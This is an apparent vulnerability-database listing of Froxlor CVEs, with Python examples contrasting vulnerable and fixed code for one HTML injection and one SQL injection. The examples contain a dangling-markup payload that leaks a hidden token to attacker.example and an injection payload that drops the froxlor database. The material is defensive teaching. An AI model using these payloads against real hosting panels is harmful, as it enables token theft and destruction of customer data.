CVE-2022-3869 – Code Injection in froxlor/froxlor
https://notcve.org/view.php?id=CVE-2022-3869
Code Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
References:
https://github.com/froxlor/froxlor/commit/3f10a4adede9df83408d60ded78b51b812a763a8
https://huntr.dev/bounties/7de20f21-4a9b-445d-ae2b-15ade648900b
Weaknesses: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'); CWE-94: Improper Control of Generation of Code ('Code Injection')
CVE-2022-3721 – Code Injection in froxlor/froxlor
https://notcve.org/view.php?id=CVE-2022-3721
Code Injection in GitHub repository froxlor/froxlor prior to 0.10.39.
References:
https://github.com/froxlor/froxlor/commit/1182453c18a83309a3470b2775c148ede740806c
https://huntr.dev/bounties/a3c506f0-5f8a-4eaa-b8cc-46fb9e35cf7a
Weaknesses: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'); CWE-94: Improper Control of Generation of Code ('Code Injection')
CVE-2022-3017 – Cross-Site Request Forgery (CSRF) in froxlor/froxlor
https://notcve.org/view.php?id=CVE-2022-3017
Cross-Site Request Forgery (CSRF) in GitHub repository froxlor/froxlor prior to 0.10.38.
References:
https://github.com/froxlor/froxlor/commit/bbe82286aae21328668f24857995a67598fe978a
https://huntr.dev/bounties/5250c4b1-132b-4da6-9bd6-db36cb56bea0
Weakness: CWE-352: Cross-Site Request Forgery (CSRF)
CVE-2020-29653
https://notcve.org/view.php?id=CVE-2020-29653
Froxlor through 0.10.22 does not validate user input passed in the customermail GET parameter. The value of this parameter is reflected into the login page, allowing the injection of arbitrary HTML tags.
References:
https://github.com/Froxlor/Froxlor/commits/master
https://github.com/Froxlor/Froxlor/security/advisories
https://nozero.io/en/cve-2020-29653-froxlor-html-injection-dangling-markup
Weakness: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
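What an unescaped reflection of the customermail parameter makes possible, as an added example in Python that is not Froxlor's PHP code: a constructed login-form skeleton reflects the parameter verbatim into an attribute (the vulnerable pattern), and a second renderer encodes it for the attribute context first. The payload, form layout, token value and attacker host are all constructed for illustration, and the small leaked_by_dangling_markup function models only one thing: an injected <img src='...' whose quote is never closed by the attacker runs to the next single quote in the page, so the markup in between (here a hidden token) is sent to the attacker's server without any script executing.

```python
import html
import re
from typing import Optional

# Constructed payload for the customermail GET parameter. The advisory only says
# the value is reflected unescaped into the login page; this payload illustrates
# the dangling-markup variant of CWE-79 and is not taken from the original report.
DANGLING_MARKUP_PAYLOAD = "\"><img src='https://attacker.example/leak?"

# Constructed login-page skeleton (not Froxlor's template): the reflected value
# pre-fills a field, a secret follows it in the document, and a later
# single-quoted attribute gives the injected src attribute somewhere to end.
LOGIN_TEMPLATE = (
    '<form method="post" action="index.php">\n'
    '<input type="text" name="loginname" value="{customermail}">\n'
    '<input type="hidden" name="csrf_token" value="{token}">\n'
    '<input type="submit" value="Login">\n'
    "<a href='index.php?action=forgotpwd'>Forgot your password?</a>\n"
    "</form>"
)


def render_login_vulnerable(customermail: str, token: str) -> str:
    """Reflects the GET parameter verbatim: the pattern CVE-2020-29653 describes."""
    return LOGIN_TEMPLATE.format(customermail=customermail, token=token)


def render_login_fixed(customermail: str, token: str) -> str:
    """Same page, but the value is encoded for an HTML attribute context first:
    < > & " and ' all become character references, so no tag or quote survives."""
    safe = html.escape(customermail, quote=True)
    return LOGIN_TEMPLATE.format(customermail=safe, token=token)


def leaked_by_dangling_markup(page: str) -> Optional[str]:
    """Minimal model of the browser's view of an injected <img src='...'>:
    the attribute value runs to the next single quote, so every byte between
    the injection point and that quote becomes part of the request URL.
    Returns that leaked fragment, or None when no such tag is in the page."""
    m = re.search(r"<img src='([^']*)'", page)
    return m.group(1) if m else None


def reflected_value(page: str) -> str:
    """What the browser displays in the loginname field after attribute decoding."""
    m = re.search(r'name="loginname" value="([^"]*)"', page)
    return html.unescape(m.group(1)) if m else ""


if __name__ == "__main__":
    token = "constructed-csrf-token-123"
    vuln = render_login_vulnerable(DANGLING_MARKUP_PAYLOAD, token)
    print("vulnerable page leaks:", leaked_by_dangling_markup(vuln))
    fixed = render_login_fixed(DANGLING_MARKUP_PAYLOAD, token)
    print("fixed page leaks:", leaked_by_dangling_markup(fixed))
    print("fixed page still displays:", reflected_value(fixed))
```

The fixed renderer does not reject or strip the input; it only encodes it, so a legitimate e-mail address renders identically in both versions while the payload is shown back to the user as literal text. Encoding has to match the output context: html.escape with quote=True is right for an attribute value, but a value placed inside a script block or a URL needs a different encoder.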
CVE-2021-42325 – Froxlor 0.10.29.1 - SQL Injection (Authenticated)
https://notcve.org/view.php?id=CVE-2021-42325
Froxlor through 0.10.29.1 allows SQL injection in Database/Manager/DbManagerMySQL.php via a custom DB name. The exploit write-up describes it as a remote, authenticated SQL injection that can enable an attacker to achieve remote code execution.
References:
https://www.exploit-db.com/exploits/50502
https://github.com/AK-blank/CVE-2021-42325-
http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html
https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782
Weakness: CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
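What "SQL injection via a custom DB name" comes down to, as an added example in Python rather than Froxlor's PHP: a database name is an identifier, so it is spliced into the CREATE DATABASE statement as text, and a prepared-statement placeholder cannot take its place. The vulnerable builder, the payload, the allowlist policy and the small statement counter below are all constructed for illustration; none of it is derived from DbManagerMySQL.php, the fix commit, or the published exploit.

```python
import re

# MySQL accepts unquoted identifiers of 1..64 characters from [0-9a-zA-Z$_].
# Allowlisting to that set is this example's policy, not Froxlor's own check.
IDENTIFIER_RE = re.compile(r"[0-9A-Za-z$_]{1,64}")

# Constructed attacker-supplied "custom DB name": the backtick closes the quoted
# identifier, a second statement follows, and "-- " comments out the remainder.
PAYLOAD = "pwned`; DROP DATABASE froxlor; -- "


def create_database_vulnerable(db_name: str) -> str:
    """Concatenates the caller's name into DDL. Wrapping it in backticks looks
    safe but is not: a backtick inside the name terminates the identifier."""
    return f"CREATE DATABASE `{db_name}`"


def quote_identifier(name: str) -> str:
    """Backtick-quote an identifier the way MySQL expects, doubling any
    embedded backtick so the whole name stays a single token."""
    return "`" + name.replace("`", "``") + "`"


def is_valid_db_name(name: str) -> bool:
    return IDENTIFIER_RE.fullmatch(name) is not None


def create_database_fixed(db_name: str) -> str:
    """Identifiers cannot be bound as prepared-statement parameters, so the
    name is allowlisted first and only then quoted."""
    if not is_valid_db_name(db_name):
        raise ValueError(f"invalid database name: {db_name!r}")
    return f"CREATE DATABASE {quote_identifier(db_name)}"


def count_statements(sql: str) -> int:
    """Count top-level statements in a MySQL string, honouring backtick-quoted
    identifiers and single-quoted strings (both with quote doubling) and
    "-- " comments. Stands in for the server's view of the text."""
    count, pending, i, n = 0, False, 0, len(sql)
    quote = None  # the active quote character, if any
    while i < n:
        ch = sql[i]
        if quote:
            if ch == quote:
                if i + 1 < n and sql[i + 1] == quote:  # doubled quote: literal
                    i += 2
                    continue
                quote = None
        elif ch in "`'":
            quote = ch
            pending = True
        elif sql.startswith("-- ", i):  # comment runs to end of line
            nl = sql.find("\n", i)
            if nl == -1:
                break
            i = nl + 1
            continue
        elif ch == ";":
            if pending:
                count += 1
            pending = False
        elif not ch.isspace():
            pending = True
        i += 1
    return count + (1 if pending else 0)


if __name__ == "__main__":
    vuln = create_database_vulnerable(PAYLOAD)
    print(vuln, "->", count_statements(vuln), "statements")
    print(create_database_fixed("customer_db"))
    try:
        create_database_fixed(PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)
```

The counter shows the two controls separately: the vulnerable builder hands the server two statements, while either correct backtick doubling or the allowlist keeps the attacker's name a single identifier. Allowlisting remains the primary control here, since the character set and 64-character limit are what MySQL will accept anyway, and in a hosting panel the same name is usually reused in later GRANT and DROP statements where quoting is easy to forget.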